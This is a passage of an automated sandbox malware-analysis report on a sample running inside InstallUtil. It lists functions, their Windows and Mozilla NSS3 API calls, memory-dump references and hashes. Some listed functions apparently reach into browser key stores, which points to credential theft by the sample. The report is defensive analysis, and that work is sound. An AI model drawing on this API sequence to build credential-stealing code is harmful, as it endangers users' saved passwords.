                                                                                                                  • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                  • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                  Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                  • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                  • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                  • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                  Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1699248803-0
                                                                                                                  • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                  • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                  • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                  • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                  Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                  • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                  • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                  • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                  Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileOperation
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3080627654-0
                                                                                                                  • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                  • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                                                  • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                  • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                                                  Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                  • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                  • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                  • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                  Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2803490479-0
                                                                                                                  • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                  • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                  • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                  • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                  Non-executed Functions

                                                                                                                  Function 6C7B4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C79601B,?,00000000,?), ref: 6C7B486F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7B48A8
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7B48BE
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7B48DE
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7B48F5
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C7B490A
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C7B4919
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C7B493F
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4970
                                                                                                                  • PORT_Alloc_Util.NSS3(00000001), ref: 6C7B49A0
                                                                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7B49AD
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B49D4
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7B49F4
                                                                                                                  • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C7B4A10
                                                                                                                  • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C7B4A27
                                                                                                                  • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C7B4A3D
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C7B4A4F
                                                                                                                  • PL_strcasecmp.NSS3(00000000,every), ref: 6C7B4A6C
                                                                                                                  • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C7B4A81
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4AAB
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7B4ABE
                                                                                                                  • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C7B4ADC
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4B17
                                                                                                                  • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7B4B33
                                                                                                                    • Part of subcall function 6C7B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B413D
                                                                                                                    • Part of subcall function 6C7B4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B4162
                                                                                                                    • Part of subcall function 6C7B4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B416B
                                                                                                                    • Part of subcall function 6C7B4120: PL_strncasecmp.NSS3(2B{l,?,00000001), ref: 6C7B4187
                                                                                                                    • Part of subcall function 6C7B4120: NSSUTIL_ArgSkipParameter.NSS3(2B{l), ref: 6C7B41A0
                                                                                                                    • Part of subcall function 6C7B4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B41B4
                                                                                                                    • Part of subcall function 6C7B4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7B41CC
                                                                                                                    • Part of subcall function 6C7B4120: NSSUTIL_ArgFetchValue.NSS3(2B{l,?), ref: 6C7B4203
                                                                                                                  • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C7B4B53
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4B94
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4BA7
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4BB7
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4BC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                  • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                  • API String ID: 3791087267-1256704202
                                                                                                                  • Opcode ID: 1070ab33cbb80d26fe5e63843d9e1c745231fff47745cf7702d3def955d20a61
                                                                                                                  • Instruction ID: 8eff326972254284a758637e6eb86899d59c299123c7b7e03401611a3c3a95eb
                                                                                                                  • Opcode Fuzzy Hash: 1070ab33cbb80d26fe5e63843d9e1c745231fff47745cf7702d3def955d20a61
                                                                                                                  • Instruction Fuzzy Hash: 45C115B0E452559BEB108FA89E44BAF7BB8AF06248F140438E995B7B01E7319914D7A1
                                                                                                                  Function 6C79A650 Relevance: 31.8, APIs: 21, Instructions: 278memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C79A670
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PK11_GetInternalKeySlot.NSS3 ref: 6C79A67E
                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C79A69B
                                                                                                                    • Part of subcall function 6C779520: PK11_IsLoggedIn.NSS3(00000000,?,6C7A379E,?,00000001,?), ref: 6C779542
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A6C0
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79A703
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79A718
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79A78B
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000104,?,00000000), ref: 6C79A7DD
                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C79A7FA
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C79A818
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79A82F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A868
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C79A873
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79A884
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C79A894
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C79A8D9
                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,00000000,00000000,00000000), ref: 6C79A8F0
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8B0B04), ref: 6C79A93F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79A952
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C79A961
                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001), ref: 6C79A96E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Item_$Zfree$Arena_Free$Alloc_ArenaContext$AuthenticateBlockCipherCreateCriticalDestroyEncodeEnterInitInternalLockLoggedPoolSectionSizeSlotUnlockValuecallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1441238854-0
                                                                                                                  • Opcode ID: 31c0384a3b805dce0d82770dac3448a86b7d9b4429161ec344cd8822e03de113
                                                                                                                  • Instruction ID: f42e27352995c31df65a37b55f3595b7b2d8f5fc414a71c64655ffa2e6544e1f
                                                                                                                  • Opcode Fuzzy Hash: 31c0384a3b805dce0d82770dac3448a86b7d9b4429161ec344cd8822e03de113
                                                                                                                  • Instruction Fuzzy Hash: DD91F7B1E012089FEB01DFA5EE49AAEB7B8EF1531CF144535E814AB701F7719909C791
                                                                                                                  Function 6C780570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C7805E3
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78060C
                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C78061A
                                                                                                                  • PK11_PubDeriveWithKDF.NSS3 ref: 6C780712
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C780740
                                                                                                                  • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C780760
                                                                                                                  • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C7807AE
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C7807BC
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C7807D1
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7807DD
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7807EB
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C7807F8
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C78082F
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C7808A9
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C7808D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 657680294-0
                                                                                                                  • Opcode ID: 7300a998137b0057d0373d56cbdeecea906fc84d01833b991823e28b6c44db6c
                                                                                                                  • Instruction ID: 9dba0b96f0cda3da8fbeb69bfd2f98ae3291f4b80d0b62dca71698b5265806ba
                                                                                                                  • Opcode Fuzzy Hash: 7300a998137b0057d0373d56cbdeecea906fc84d01833b991823e28b6c44db6c
                                                                                                                  • Instruction Fuzzy Hash: 0491C371A063409BEB10CF25DE48B5B77E1EF84318F148A3CEA9987791EB31D954CB92
                                                                                                                  Function 6C7BEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF0AE
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF0C8
                                                                                                                  • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7BF101
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BF11D
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C88218C), ref: 6C7BF183
                                                                                                                  • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7BF19A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BF1CB
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7BF1EF
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7BF210
